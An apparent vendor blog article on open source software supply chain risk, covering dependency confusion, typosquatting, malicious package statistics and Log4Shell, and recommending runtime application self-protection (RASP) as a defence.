Is Open Source Software Crippling the Software Supply Chain?
Open Source has defined the modern tech stack. Underpinning the minute activities of every working day and avid consumer is the hard work of revolutionary developers. A number of high-profile vulnerabilities have shed doubt on the impact of open source coding on application security, throwing one question into the limelight: is open source code a threat to your attack surface?
Innovation Through Collaboration
Open source is everywhere. Technically, however, the term open source is far broader than simply lines of code. This term describes a form of licensing agreement that a creator sets; open source simply allows for the free modification and replication of an individual’s work. This can take many different forms; whether it’s improving on the foundational project, or integrating the work into a larger, more complex project, open source allows for cutting-edge work to resonate throughout an entire industry. In the software development world, the removal of these barriers between innovators facilitates the free exchange of ideas.
Open source has a long history – almost as old as software itself. As tech companies such as Microsoft and Apple began to pick up steam throughout the 70s and 80s, open source was established enough to be considered a threat. This is reflected in Bill Gates’ infamous “Open Letter to Hobbyists”, which requested open-source developers to stop copying his company’s software. Open source only picked up greater momentum throughout the 90s, as the Apache Software foundation began to share web server knowledge throughout the developing tech world. Linux, Python and Github would all follow in the decade thereafter – all organizations that have placed open source at the heart of their mission.
Open source code has conquered the world thanks to one simple fact: it’s written by developers, for developers. The focus that open source collectively places on innovation – without the barriers of licensing- has resulted in open-source libraries becoming the cornerstone upon which many industry-defining web apps have been built.
Most organizations rely on at least one web app: at the scale of mature enterprise, open source technology is likely powering mission-critical areas of web apps. In a recent State of the Software Supply chain report, it’s estimated that – in 2021 alone – 2.2 trillion open source packages were used to improve app performance and accelerate time to market.
Open Source Is a Live Target
The prevalence of open source code, lying in large online repositories, called upon by thousands of apps across millions of businesses, makes for an exceedingly tempting honeypot. These are some of the most reliable – and profitable – methods of conducting supply chain attacks today. The most common methods of poisoning code repositories are via dependency confusion and typosquatting. These both rely on the fact that, within software development, tools called dependency managers will automatically download and implement open source code within applications.
In attacks that focus on dependency confusion, attackers craft their own version of a common package, with two major changes: first, it’s loaded with an exploitable weakness, and then issued a later version number. This tricks the dependency manager into assuming the compromised package is the most-recently updated – and therefore safest – option, before being automatically implemented. Typosquatting attacks take a slightly different approach. Here, attackers create a similarly malicious version of a popular package, but with a single letter misplaced. The idea is that the legitimate developer will make a simple mistype. Within hundreds of lines of code, a single typing mistake can see the implanting of a security backdoor.
Researchers identified that, throughout the last year, over 55,000 malicious packages were uploaded to a number of open source repositories – most common of which focused on Python and Node.js. Over the past three years, the number rises to an astonishing 95,000 – meaning the last three years have seen a whopping 700% rise in these attacks.
The effects of these malware-infested – apparently innocuous – packages is felt largely by upstream developers and software providers. Given the sheer quantity of these packages, it becomes nigh impossible to manually test. In the most serious of cases, attackers can poison a well that supplies millions. This is precisely what occurred with the all-too-recent Log4Shell vulnerability. Apache’s popular logging functionality – single-handedly supporting apps such as Minecraft, Apple iCloud, and AWS – was found to be deeply vulnerable. Thanks to this single oversight in the open source code bank, millions of apps were suddenly exposed to malware-laded, attacker-controlled servers.
Unfortunately, log4shell’s massive supply chain attack is only one of millions. It’s estimated that 24% of all open source projects contain at least one known vulnerability. This is how you can help shore up your organization’s defenses against the growing threat of open source attack.
How to secure your OS supply chain
Before delving into a few key forms of open source security, it’s worth noting that open source projects can actually benefit from higher security than the average commercial code. Lines of open source software are fully and freely available, opening them up to independent examination and audits by qualified professionals.
With that said, the possibility of a well-poisoning attack is ever-present in the complex and rapidly-changing world of app development. Instead of waiting around for an attack, your organization needs to take a proactive approach to securing the apps that support daily operations. One of the most effective forms of protection is via Runtime Application Self-Protection, shortened to RASP. RASP straddles an application, lending visibility into the precise behaviors and permissions of the application itself. Once these behaviors are established, it becomes possible to contextually analyze user behavior and application traffic. This in turn empowers the real-time detection of abnormal behavior, often the first sign of an upcoming cyberattack. Once this suspect activity is flagged, RASP can alert the security team to a potential weakness, alongside proactively shutting down the suspect activity.
RASP represents only one of the next-generation security tools that now defend an intensely divided and scattered supply chain. Keeping your own organization – and its customers – safe is the primary goal of high-quality security solution providers.